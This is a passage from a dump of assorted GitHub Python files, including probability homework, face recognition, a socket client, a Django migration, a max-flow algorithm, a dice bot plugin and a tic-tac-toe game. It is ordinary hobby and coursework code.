события\nq = 1 - p # обратная вероятность\n\nprobability = combination(n, k) * p**k * q**(n-k)\nprint(f'Вероятность того, что стрелок попадет в цель ровно 85 раз: {round(probability * 100, 3)} %')\nprint()\n\n# 2. Вероятность того, что лампочка перегорит в течение первого дня эксплуатации, равна 0.0004.\n# В жилом комплексе после ремонта в один день включили 5000 новых лампочек.\n# Какова вероятность, что ни одна из них не перегорит в первый день? Какова вероятность, что перегорят ровно две?\n\nn = 5000\np = 0.0004\nlambda1 = n * p\n\nm = 0\nprobability0 = ((lambda1**m) / factorial(m)) * exp(-lambda1)\nprint(f'Вероятность того, что ни одна из лампочек не перегорит в первый день: {round(probability0 * 100, 3)} %')\n\nm = 2\nprobability2 = ((lambda1**m) / factorial(m)) * exp(-lambda1)\nprint(f'Вероятность того, что перегорят ровно две лампочки: {round(probability2 * 100, 3)} %')\nprint()\n\n# 3. Монету подбросили 144 раза. Какова вероятность, что орел выпадет ровно 70 раз?\nn = 144 # число испытания\nk = 70 # число наступлений события\np = 0.5 # вероятноять наступления события\nq = 1 - p # обратная вероятность\n\nprobability = combination(n, k) * p**k * q**(n-k)\nprint(f'Вероятность того, что орел выпадет ровно 70 раз: {round(probability * 100, 3)} %')\nprint()\n\n# 4. В первом ящике находится 10 мячей, из которых 7 - белые. Во втором ящике - 11 мячей, из которых 9 белых.\n# Из каждого ящика вытаскивают случайным образом по два мяча. Какова вероятность того, что все мячи белые?\n# Какова вероятность того, что ровно два мяча белые? Какова вероятность того, что хотя бы один мяч белый?\n\n# вероятность того, что все мячи белые: надо из первого ящика вытащить оба белых мяча и из второго ящика тоже оба белых мяча\n# для первого ящика\ncombination_white2_box1 = combination(7, 2) # вариантов вытянуть 2 белых мяча из 7 возможных\ncombination_all_box1 = combination(10, 2) # всего вариантов вытянуть 2 мяча из 10\n\nprobability_white2_box1 = combination_white2_box1 / combination_all_box1\nprint(f'Вероятность вытащить из первого ящика оба белых мяча: {round(probability_white2_box1 * 100, 3)} %')\n\n# для второрго ящика\ncombination_white2_box2 = combination(9, 2) # вариантов вытянуть 2 белых мяча из 9 возможных\ncombination_all_box2 = combination(11, 2) # всего вариантов вытянуть 2 мяча из 11\n\nprobability_white2_box2 = combination_white2_box2 / combination_all_box2\nprint(f'Вероятность вытащить из второго ящика оба белых мяча: {round(probability_white2_box2 * 100, 3)} %')\n\nprint(f'Общая вероятность вытащить все белые мячи: {round(probability_white2_box1 * probability_white2_box2 * 100, 3)} %')\n\n#вероятность того, что ровно два мяча белые:\n# подойдут ситуации когда:\n\n# из первого ящика взяли 2 белых мяча и из второго 0\n# вероятность первого ящика нам уже известна по расчётам ранее\nprint(f'Вероятность вытащить из первого ящика оба белых мяча: {round(probability_white2_box1 * 100, 3)} %')\n# 0 белых из второго ящика, т.е оба чёрные\ncombination_white0_box2 = combination(2, 2) # вариантов вытянуть 2 чёрных мяча из 2 возможных\nprobability_white0_box2 = combination_white0_box2 / combination_all_box2\nprint(f'Вероятность вытащить из второго ящика ни одного белого мяча: {round(probability_white0_box2 * 100, 3)} %')\n# или\n# из первого ящика 1 белый и из второго ящика 1 белый\n# для первого ящика\ncombination_white1_box1 = combination(7, 1) # вариантов вытянуть 1 белый мяч из 7 возможных\ncombination_black1_box1 = combination(3, 1) # вариантов вытянуть 1 чёрный мяч из 3 возможных\n# для второрго ящика\ncombination_white1_box2 = combination(9, 1) # вариантов вытянуть 1 белый мяч из 9 возможных\ncombination_black1_box2 = combination(2, 1) # вариантов вытянуть 1 чёрный мяч из 2 возможных\n\nprobability_white1_box1 = (combination_white1_box1 * combination_black1_box1)/ combination_all_box1\nprint(f'Вероятность вытащить из первого ящика 1 белый мяч: {round(probability_white1_box1 * 100, 3)} %')\n\nprobability_white1_box2 = (combination_white1_box2 * combination_black1_box2) / combination_all_box2\nprint(f'Вероятность вытащить из второго ящика 1 белый мяч: {round(probability_white1_box2 * 100, 3)} %')\n# или\n# из первого ящика взяли 0 белых мячей (2 чёрных) и из второго 2\ncombination_white0_box1 = combination(3, 2) # вариантов вытянуть 2 чёрных мяча из 3 возможных\nprobability_white0_box1 = combination_white0_box1 / combination_all_box1\nprint(f'Вероятность вытащить из первого ящика ни одного белого мяча: {round(probability_white0_box1 * 100, 3)} %')\n# вероятность вытащить из второго ящика 2 белых мяча нам уже известна по расчётам ранее\nprint(f'Вероятность вытащить из второго ящика оба белых мяча: {round(probability_white2_box2 * 100, 3)} %')\n\nprint(f'Вероятность того, что ровно два мяча белые: { round((probability_white2_box1 * probability_white0_box2 + probability_white1_box1 * probability_white1_box2 + probability_white0_box1 * probability_white2_box2) * 100, 3)} %')\n\n# вероятность того, что хотя бы один мяч белый\n# 1 в первом и 0 во втором или 1 в первом и 1 во втором или 1 в первом и 2 во втором или 2 в первом и 0 во втором или 2 в первом и 1 во втором или 2 в первом и 2 во втором или 0 в первом и 1 во втором или 0 в первом и 2 во втором\nprint(f'Вероятность того, что хотя бы один мяч белый: {round((probability_white1_box1 * probability_white0_box2 + probability_white1_box1 * probability_white1_box2 + probability_white1_box1 * probability_white2_box2 + probability_white2_box1 * probability_white0_box2 + probability_white2_box1 * probability_white1_box2 + probability_white2_box1 * probability_white2_box2 + probability_white0_box1 * probability_white1_box2 + probability_white0_box1 * probability_white2_box2) * 100, 3)} %')","repo_name":"DemiurgXXX/DemiurgProbabilityTheory","sub_path":"lesson_2.py","file_name":"lesson_2.py","file_ext":"py","file_size_in_byte":8903,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10530339227","text":"from AI_model import *\n\nonnx_path = \"models/onnx/version-RFB-320.onnx\"\n\nsession, input_name = set_session( onnx_path )\n\nrepresentations = get_representation( get_db_images(0, \"./itzy\"), \"Facenet\", enforce_detection = False )\n\n#cap = cv2.VideoCapture(\"./ITZY_ICY.mp4\") # capture from camera\ncap = cv2.VideoCapture(0)\n\nthreshold = 0.7\n\nwhile True:\n ret, orig_image = cap.read()\n\n if ret and True:\n image = get_preprocess_image( orig_image , (320,240) )\n\n confidences, boxes = session.run(None, {input_name: image})\n\n boxes, labels, probs = get_face_area(orig_image.shape[1], orig_image.shape[0], confidences, boxes, threshold)\n\n ns = []\n\n for box in boxes:\n try :\n face = orig_image[ box[1]-30: box[3]+30 , box[0]-20: box[2]+20 ]\n\n cv2.rectangle(orig_image, (box[0], box[1]), (box[2], box[3]), (255, 255, 0), 4)\n\n name = face_recognition(face, representations)\n \n orig_image = cv2.putText(orig_image, name, (box[0], box[1]) , cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2)\n\n ns.apped( name )\n except Exception as e:\n print(e)\n\n cv2.imshow('annotated', orig_image)\n if cv2.waitKey(int(1000/30)) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"AmYongg/AI_server","sub_path":"Router/ai_model/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36859795607","text":"# Exemplo basico socket (lado ativo)\n\nimport socket\n\nHOST = 'localhost' \nPORTA = 5000 \n\nsock = socket.socket() \n\nsock.connect((HOST, PORTA)) \n\nmsg = \"\"\nwhile(1):\n print(\"Digite a mensagem a ser enviada: (ou 'exit' para finalizar)\")\n msg = input()\n if(msg==\"exit\"): break\n\n sock.send(bytes(msg,\"utf-8\"))\n resposta = sock.recv(1024) \n print(\"resposta: \",str(resposta, encoding='utf-8'))\n\n\nsock.close()","repo_name":"RenanIOliveira/SistemasDistribuidos-2021.1","sub_path":"Laboratório 1/ativo.py","file_name":"ativo.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71985026337","text":"\"\"\"Outbound message representation.\"\"\"\n\nfrom typing import Union\n\nfrom .connections.models.connection_target import ConnectionTarget\n\n\nclass OutboundMessage:\n \"\"\"Represents an outgoing message.\"\"\"\n\n def __init__(\n self,\n payload: Union[str, bytes],\n *,\n connection_id: str = None,\n encoded: bool = False,\n endpoint: str = None,\n reply_socket_id: str = None,\n reply_thread_id: str = None,\n reply_to_verkey: str = None,\n target: ConnectionTarget = None,\n ):\n \"\"\"Initialize an outgoing message.\"\"\"\n self.connection_id = connection_id\n self.encoded = encoded\n self._endpoint = endpoint\n self.payload = payload\n self.reply_socket_id = reply_socket_id\n self.reply_thread_id = reply_thread_id\n self.reply_to_verkey = reply_to_verkey\n self.target = target\n\n @property\n def endpoint(self) -> str:\n \"\"\"Return the endpoint of the outbound message.\n\n Defaults to the endpoint of the connection target.\n \"\"\"\n return self._endpoint or (self.target and self.target.endpoint)\n\n @endpoint.setter\n def endpoint(self, endp: str) -> None:\n \"\"\"Set the endpoint of the outbound message.\"\"\"\n self._endpoint = endp\n\n def __repr__(self) -> str:\n \"\"\"\n Return a human readable representation of this class.\n\n Returns:\n A human readable string for this class\n\n \"\"\"\n items = (\"{}={}\".format(k, repr(v)) for k, v in self.__dict__.items())\n return \"<{}({})>\".format(self.__class__.__name__, \", \".join(items))\n","repo_name":"OpenMined/PyAriesFL","sub_path":"aries_cloudagent/messaging/outbound_message.py","file_name":"outbound_message.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"34"} +{"seq_id":"2457514727","text":"# import modules \nimport os \nimport csv \n\n# variables\nmonths = 0\nnet_amount = 0\nprev_month= 0\ncurrent_month = 0\naverage_change = 0\nrevenue_change = 0\ngreatest_increase = 0\ngreatest_decrease = 0\ngreatest_increase_month = \"\"\ngreatest_decrease_month = \"\"\n\n\n# set path for file .csv file\ncsvpath = os.path.join('Resources','budget_data.csv')\n\n# open the .csv \nwith open(csvpath, newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n\n # read the header row first \n csv_header = next(csvreader)\n print(f\"Header: {csv_header}\")\n\n #start loop\n for row in csvreader:\n\n # calculate total month in dataset (use += to add the next row)\n months += 1\n \n # calculate net amount or revenue (row[1] sum of loss and profits)\n net_amount = net_amount + int(row[1])\n\n # set revenue = profit - previous months profit where previous month profit starts at 0 \n revenue = int(row[1]) - prev_month\n \n # calculate net change in revenue\n if months != 1:\n revenue_change = revenue_change + revenue\n \n # calculation for greatest revenue increase - use row[0] to get exact date.\n if (revenue > greatest_increase):\n greatest_increase = revenue\n greatest_increase_month = row[0]\n\n # calculation for greatest revenue decrease - use row[0] to get exact date.\n elif (revenue < greatest_decrease):\n greatest_decrease = revenue\n greatest_decrease_month = row[0]\n \n #set previous month profit to current before the start of new loop\n prev_month = int(row[1])\n\n #calculate average change \n average_change = revenue_change / (months - 1)\n\n #print financial analysis \n print(\"Financial Analysis\")\n print(\"-------------------------------------------------\")\n print(f\"Total Months: {months}\")\n print(f\"Total: ${net_amount}\")\n print(f\"Average Change: ${round(average_change,2)}\")\n print(f\"Greatest Increase in Profits: {greatest_increase_month} (${greatest_increase})\")\n print(f\"Greatest Decrease in Profits: {greatest_decrease_month} (${greatest_decrease})\") \n \n#export file to .txt \nanalysis_file = os.path.join('analysis', 'analysis.txt')\nwith open(analysis_file, \"w\") as output:\n output.write(\"Financial Analysis\\n\")\n output.write(\"-------------------------------------------------\\n\")\n output.write(f\"Total Months: {months}\\n\")\n output.write(f\"Total: ${net_amount}\\n\")\n output.write(f\"Average Change: ${round(average_change,2)}\\n\")\n output.write(f\"Greatest Increase in Profits: {greatest_increase_month} (${greatest_increase})\\n\")\n output.write(f\"Greatest Decrease in Profits: {greatest_decrease_month} (${greatest_decrease})\\n\") \n\n","repo_name":"kennywf/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23488669089","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport uuid\nimport Hindlebook.models.validators\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Author',\n fields=[\n ('about', models.CharField(default='', blank=True, max_length=250)),\n ('uuid', models.CharField(default=uuid.uuid4, blank=True, serialize=False, primary_key=True, validators=[Hindlebook.models.validators.UuidValidator()], max_length=40)),\n ('username', models.CharField(max_length=30, verbose_name='username')),\n ('github_id', models.CharField(default='', blank=True, max_length=30)),\n ('avatar', models.ImageField(upload_to='', default='default_avatar.jpg', blank=True)),\n ('date_added', models.DateTimeField(auto_now_add=True)),\n ('follows', models.ManyToManyField(blank=True, db_index=True, to='Hindlebook.Author', related_name='followed_by')),\n ('friends', models.ManyToManyField(blank=True, db_index=True, to='Hindlebook.Author', related_name='friends_of')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('tag', models.CharField(max_length=15, serialize=False, primary_key=True)),\n ],\n options={\n 'verbose_name_plural': 'Tags',\n 'ordering': ['tag'],\n 'verbose_name': 'Tags',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('guid', models.CharField(default=uuid.uuid4, blank=True, serialize=False, primary_key=True, validators=[Hindlebook.models.validators.UuidValidator()], max_length=40)),\n ('comment', models.CharField(max_length=2048)),\n ('pubDate', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='date published')),\n ('author', models.ForeignKey(related_name='comments', to='Hindlebook.Author')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Image',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('image', models.ImageField(upload_to='')),\n ('date_added', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Node',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('host', models.CharField(unique=True, max_length=100, help_text='URL of the host. ex. http://hindlebook.tamarabyte.com ')),\n ('host_name', models.CharField(default='', blank=True, max_length=50, help_text='Username/short identifier of host. ex. hindlebook', verbose_name='username')),\n ('is_connected', models.BooleanField(default=False, help_text='Whether or not we actively pull posts/authors from this node.', verbose_name='connect_with')),\n ('share_posts', models.BooleanField(default=True)),\n ('share_images', models.BooleanField(default=True)),\n ('require_auth', models.BooleanField(default=True)),\n ('password', models.CharField(default='', blank=True, max_length=128, help_text='Password this node connects to us with.')),\n ('our_username', models.CharField(default='', blank=True, max_length=128, help_text='Username this node wants from us.', verbose_name='username')),\n ('our_password', models.CharField(default='', blank=True, max_length=128, help_text='Password this node wants from us.', verbose_name='password')),\n ('team_number', models.IntegerField(default=9)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Post',\n fields=[\n ('guid', models.CharField(default=uuid.uuid4, blank=True, serialize=False, primary_key=True, validators=[Hindlebook.models.validators.UuidValidator()], max_length=40)),\n ('source', models.CharField(default='', blank=True, max_length=100)),\n ('origin', models.CharField(default='', blank=True, max_length=100)),\n ('title', models.CharField(default='', max_length=40)),\n ('description', models.CharField(default='', blank=True, max_length=40)),\n ('content', models.TextField()),\n ('pubDate', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='date published')),\n ('content_type', models.CharField(choices=[('text/plain', 'Text'), ('text/x-markdown', 'Markdown'), ('text/html', 'HTML')], default='text/plain', blank=True, max_length=15)),\n ('visibility', models.CharField(choices=[('PUBLIC', 'Public'), ('FOAF', 'Friends of Friends Only'), ('FRIENDS', 'Friends Only'), ('PRIVATE', 'Private'), ('SERVERONLY', 'Server Only')], default='PUBLIC', max_length=10, db_index=True)),\n ('author', models.ForeignKey(related_name='posts', to='Hindlebook.Author')),\n ('categories', models.ManyToManyField(blank=True, to='Hindlebook.Category', related_name='tagged_posts')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Settings',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('connection_limit', models.IntegerField(default=10, blank=True)),\n ('node', models.ForeignKey(default=1, to='Hindlebook.Node', null=True)),\n ],\n options={\n 'verbose_name_plural': 'Settings',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='image',\n name='attached_to',\n field=models.ForeignKey(to='Hindlebook.Post'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='comment',\n name='post',\n field=models.ForeignKey(related_name='comments', to='Hindlebook.Post'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='author',\n name='node',\n field=models.ForeignKey(related_name='authors', to='Hindlebook.Node'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='author',\n name='user',\n field=models.OneToOneField(related_name='author', blank=True, help_text='Set for local authors only', to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"tamara-bain/cmput410-project","sub_path":"DistributedSocialNetworking/Hindlebook/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":7352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43417547670","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 2 10:34:34 2023\r\n\r\n@author: Jonab, Shatha, Dhuha, Faizah\r\n\"\"\"\r\n\r\n#______________________Algo\"Edmonds-KARP\"_&_2D Array and stack_______________________\r\n\r\nimport time \r\n\r\ndef bfs(C, F, s, t):\r\n stack = [s]\r\n paths={s:[]}\r\n if s == t:\r\n return paths[s]\r\n while(stack):\r\n u = stack.pop()\r\n for v in range(len(C)):\r\n if(C[u][v]-F[u][v]>0) and v not in paths:\r\n paths[v] = paths[u]+[(u,v)]\r\n if v == t:\r\n return paths[v]\r\n stack.append(v)\r\n return None\r\n\r\ndef maxFlow(C, s, t):\r\n n = len(C) # C is the capacity matrix\r\n F = [[0] * n for i in range(n)]\r\n path = bfs(C, F, s, t)\r\n while path != None:\r\n flow = min(C[u][v] - F[u][v] for u,v in path)\r\n for u,v in path:\r\n F[u][v] += flow\r\n F[v][u] -= flow\r\n path = bfs(C,F,s,t)\r\n return sum(F[s][i] for i in range(n))\r\n\r\n #colom3 wight \r\ndatafile=open(\"Algo_Edmonds_KARP_DATA.txt\", \"r\") \r\nw=datafile.read().split()[2::3]\r\n\r\n\r\nfor i in range(0,len(w)):\r\n \r\n w[i]=float(w[i]) \r\n\r\n# wieht in 2d matrix\r\ndef convert_1d_to_2d(l, cols):\r\n return [l[i:i + cols] for i in range(0, len(l), cols)]\r\n\r\nC=convert_1d_to_2d(w, 353)\r\n\r\nC.pop(353)\r\nsource = 1 # A\r\nsink = 200 # F\r\nstart = time.process_time() \r\nmaxVal = maxFlow(C, source, sink)\r\nprint(\"max_flow_value is: \", maxVal)\r\nprint(time.process_time()-start)","repo_name":"Jonab2oo1/Algorithm-Project","sub_path":"2D Array & Stack_Edmonds_Karp.py","file_name":"2D Array & Stack_Edmonds_Karp.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29060323613","text":"import string\n\nwith open('day_6/input.txt', 'r') as f:\n dirty_data = f.read().split('\\n\\n')\n dirty_data = [word.replace('\\n', '') for word in dirty_data]\n\ndataset = dict.fromkeys(string.ascii_lowercase, 0)\ntotal_valid = 0\n\nfor everyline in dirty_data: \n for ch in everyline: \n if dataset[ch] == 0:\n dataset[ch] = 1\n \n valid_answer_count = sum(value == 1 for value in dataset.values())\n total_valid += valid_answer_count\n dataset = dict.fromkeys(string.ascii_lowercase, 0)\n\nprint(f'\\nTotal valid answers: {total_valid}')\n\n\n","repo_name":"SpawnTerror/AdventOfCode-2020","sub_path":"day_6/day6_part1.py","file_name":"day6_part1.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74981538338","text":"def gcd(a, b):\n while (b > 0):\n a, b = b, a % b\n \n return a\n\ndef extgcd(a, b):\n # Return in x and y form a*x + b*y\n # x is the inverse of a\n # y is the inverse if b\n # There is only an inverse if gcd(a,b) == 1\n if a == 0:\n return (0, 1)\n else:\n x, y = extgcd(b % a, a)\n x1 = y - (b // a) * x\n y1 = x\n return (x1, y1)\n\ndef moduloInverseOf(a, b):\n inv = extgcd(a, b)\n return inv[0] % b\n\nif __name__ == \"__main__\":\n \n numberList = [0, 1, 2, 3, 4 ,5]\n b = 5\n\n for a in numberList:\n resultGCD = gcd(a,b)\n\n inverse = \"No Inverse\"\n if resultGCD == 1:\n inverse = moduloInverseOf(a, b)\n\n print(\"Greatest Common Divisor: \", resultGCD)\n print(\"Inverse of \" + str(a) + \" mod \" + str(b) + \" is: \", inverse)\n print(\"------------------------------\")","repo_name":"FasterCoding/Greatest-Common-Divisor","sub_path":"python/euclid.py","file_name":"euclid.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8813691517","text":"# -*-coding:utf-8 -*-\nimport xmpp, time, re, random\nfrom ritsu_api import *\n\ndrexp = re.compile(r'^(\\d+)([DdUuZzWw])(\\d+)(?:([HhLlEeFf\\+\\-\\*\\/])(\\d+))?$')\n\ndef command_dice(bot, room, nick, access_level, parameters, message):\n if not parameters:\n return u'Ты выиграл!'\n dice_strs = map(lambda x: x.strip(), parameters.split(';'))\n if len(dice_strs) > 10:\n return u'Дохуя кубиков за раз!'\n return u'\\n'.join(map(run_dice, dice_strs))\n\ndef run_dice(dice_str):\n result = ''\n m = drexp.match(dice_str)\n if m:\n count = int(m.group(1))\n die_type = m.group(2)\n die_sides = int(m.group(3))\n operator = m.group(4)\n operator_arg = m.group(5)\n if operator_arg:\n operator_arg = int(operator_arg)\n if count > 100 or die_sides > 1000 or (operator and operator_arg > 1000):\n return u'Дохуя'\n if (die_sides == 0) or ((die_type == 'w' or die_type == 'W') and (die_sides < 2)):\n return u'Охуел?'\n dice_runs = dice(count, die_type, die_sides)\n result += u'(' + u', '.join(map(str, dice_runs)) + u')'\n if not operator:\n result += u' = %d' % sum(dice_runs)\n elif operator == '+':\n result += u' + %d = %d' % (operator_arg, sum(dice_runs) + operator_arg)\n elif operator == '-':\n result += u' - %d = %d' % (operator_arg, sum(dice_runs) - operator_arg)\n elif operator == '*':\n result += u' * %d = %d' % (operator_arg, sum(dice_runs) * operator_arg)\n elif operator == '/':\n result += u' / %d = %d' % (operator_arg, sum(dice_runs) / operator_arg)\n elif operator == 'H' or operator == 'h':\n sorted_runs = sorted(dice_runs)\n vals = sorted_runs[-operator_arg:]\n result += u' макс (' + u', '.join(map(str, vals)) + (u') = %d' % sum(vals))\n elif operator == 'L' or operator == 'l':\n sorted_runs = sorted(dice_runs)\n vals = sorted_runs[0:operator_arg]\n result += u' мин (' + u', '.join(map(str, vals)) + (u') = %d' % sum(vals))\n elif operator == 'E' or operator == 'e':\n vals = map(lambda x: 1 if x >= operator_arg else 0, dice_runs)\n vals_str = map(lambda x: u'Успех' if x == 1 else u'Фейл', vals)\n result += u' успехи (' + u', '.join(vals_str) + (u') = %d' % sum(vals))\n elif operator == 'F' or operator == 'f':\n vals = map(lambda x: 1 if x >= operator_arg else -1, dice_runs)\n vals_str = map(lambda x: u'Успех' if x == 1 else u'Фейл', vals)\n result += u' успехи минус фейлы (' + u', '.join(vals_str) + (u') = %d' % sum(vals))\n return result\n else:\n return u\"Обосрался ты, брат, с '%s'\" % dice_str\n\ndef die(typ, sides):\n if typ == 'D' or typ == 'd':\n return [random.randint(1,sides)]\n elif typ == 'Z' or typ == 'z':\n return [random.randint(0,sides-1)]\n elif typ == 'U' or typ == 'u':\n return [random.randint(-sides,sides)]\n elif typ == 'W' or typ == 'w':\n r = []\n d = die('d', sides)\n while d == [sides]:\n r += d\n d = die('d', sides)\n r += d\n return r\n\ndef dice(num, typ, sides):\n # Гвидо, я твою мать ебал\n r = []\n for i in range(num):\n r += die(typ, sides)\n return r\n\ndef load(bot):\n random.seed()\n bot.add_command('dice', command_dice, LEVEL_GUEST, 'dice')\n bot.add_command(u'к', command_dice, LEVEL_GUEST, 'dice')\n bot.add_command(u'куб', command_dice, LEVEL_GUEST, 'dice')\n\ndef unload(bot):\n pass\n\ndef info(bot):\n return 'Dice plugin v1.0.1'\n\n","repo_name":"ridouchire/RitsuBot","sub_path":"plugin_command_dice.py","file_name":"plugin_command_dice.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3173520098","text":"import pygame\nimport sys\nimport time\n\nimport tictactoe as ttt\n\npygame.init()\nsize = width, height = 600, 400\n\n# Colors\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\n\nscreen = pygame.display.set_mode(size)\n\nmediumFont = pygame.font.Font(\"OpenSans-Regular.ttf\", 28)\nlargeFont = pygame.font.Font(\"OpenSans-Regular.ttf\", 40)\nmoveFont = pygame.font.Font(\"OpenSans-Regular.ttf\", 60)\n\nuser = None\nboard = ttt.initial_state()\nai_turn = False\n\nwhile True:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n screen.fill(black)\n\n # Let user choose a player.\n if user is None:\n\n # Draw title\n title = largeFont.render(\"Play Tic-Tac-Toe\", True, white)\n titleRect = title.get_rect()\n titleRect.center = ((width / 2), 50)\n screen.blit(title, titleRect)\n\n # Draw buttons\n playXButton = pygame.Rect((width / 8), (height / 2), width / 4, 50)\n playX = mediumFont.render(\"Play as X\", True, black)\n playXRect = playX.get_rect()\n playXRect.center = playXButton.center\n pygame.draw.rect(screen, white, playXButton)\n screen.blit(playX, playXRect)\n\n playOButton = pygame.Rect(5 * (width / 8), (height / 2), width / 4, 50)\n playO = mediumFont.render(\"Play as O\", True, black)\n playORect = playO.get_rect()\n playORect.center = playOButton.center\n pygame.draw.rect(screen, white, playOButton)\n screen.blit(playO, playORect)\n\n # Check if button is clicked\n click, _, _ = pygame.mouse.get_pressed()\n if click == 1:\n mouse = pygame.mouse.get_pos()\n if playXButton.collidepoint(mouse):\n time.sleep(0.2)\n user = ttt.X\n elif playOButton.collidepoint(mouse):\n time.sleep(0.2)\n user = ttt.O\n\n else:\n\n # Draw game board\n tile_size = 80\n tile_origin = (width / 2 - (1.5 * tile_size),\n height / 2 - (1.5 * tile_size))\n tiles = []\n for i in range(3):\n row = []\n for j in range(3):\n rect = pygame.Rect(\n tile_origin[0] + j * tile_size,\n tile_origin[1] + i * tile_size,\n tile_size, tile_size\n )\n pygame.draw.rect(screen, white, rect, 3)\n\n if board[i][j] != ttt.EMPTY:\n move = moveFont.render(board[i][j], True, white)\n moveRect = move.get_rect()\n moveRect.center = rect.center\n screen.blit(move, moveRect)\n row.append(rect)\n tiles.append(row)\n\n game_over = ttt.terminal(board)\n player = ttt.player(board)\n\n # Show title\n if game_over:\n winner = ttt.winner(board)\n if winner is None:\n title = f\"Game Over: Tie.\"\n else:\n title = f\"Game Over: {winner} wins.\"\n elif user == player:\n title = f\"Play as {user}\"\n else:\n title = f\"Computer thinking...\"\n title = largeFont.render(title, True, white)\n titleRect = title.get_rect()\n titleRect.center = ((width / 2), 30)\n screen.blit(title, titleRect)\n\n # Check for AI move\n if user != player and not game_over:\n if ai_turn:\n time.sleep(0.5)\n move = ttt.minimax(board)\n board = ttt.result(board, move)\n ai_turn = False\n else:\n ai_turn = True\n\n # Check for a user move\n click, _, _ = pygame.mouse.get_pressed()\n if click == 1 and user == player and not game_over:\n mouse = pygame.mouse.get_pos()\n for i in range(3):\n for j in range(3):\n if (board[i][j] == ttt.EMPTY and tiles[i][j].collidepoint(mouse)):\n board = ttt.result(board, (i, j))\n\n if game_over:\n againButton = pygame.Rect(width / 3, height - 65, width / 3, 50)\n again = mediumFont.render(\"Play Again\", True, black)\n againRect = again.get_rect()\n againRect.center = againButton.center\n pygame.draw.rect(screen, white, againButton)\n screen.blit(again, againRect)\n click, _, _ = pygame.mouse.get_pressed()\n if click == 1:\n mouse = pygame.mouse.get_pos()\n if againButton.collidepoint(mouse):\n time.sleep(0.2)\n user = None\n board = ttt.initial_state()\n ai_turn = False\n\n pygame.display.flip()\n","repo_name":"wbsth/cs50ai","sub_path":"week0/tictactoe/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"34"} +{"seq_id":"34558355472","text":"from node import Node\n\ndef hash_join_define(node : Node, condition,index_column_dict):\n \"\"\" \n Returns the natural langauge description of the Hash Join Node Types\n \n Paramemter node: the Node object.\n\n Paramemter condition: The specific SQL Query clause.\n\n Parameter index_column_dict: The dictionary that contains the index names and their respecitve tables and table columns. \n \n \"\"\"\n\n result = \"The clause \" + condition + f\" performs a join operation using Hash {node.information['Join Type']} Join based on the result from the previous hash operation\" \n join_filter = node.join_filters[0]\n result += \" on the condition: {}\".format(join_filter)\n if (\" = \" in condition):\n result += \" as it is an equi-join, but also\"\n return result\n\n","repo_name":"Sdidt/CX4031_Project2","sub_path":"result_parser/node_types/hash_join.py","file_name":"hash_join.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15488168025","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport weakref\n\n\n\"\"\"\nCaching Objects\n\n\nThe ref and proxy classes are 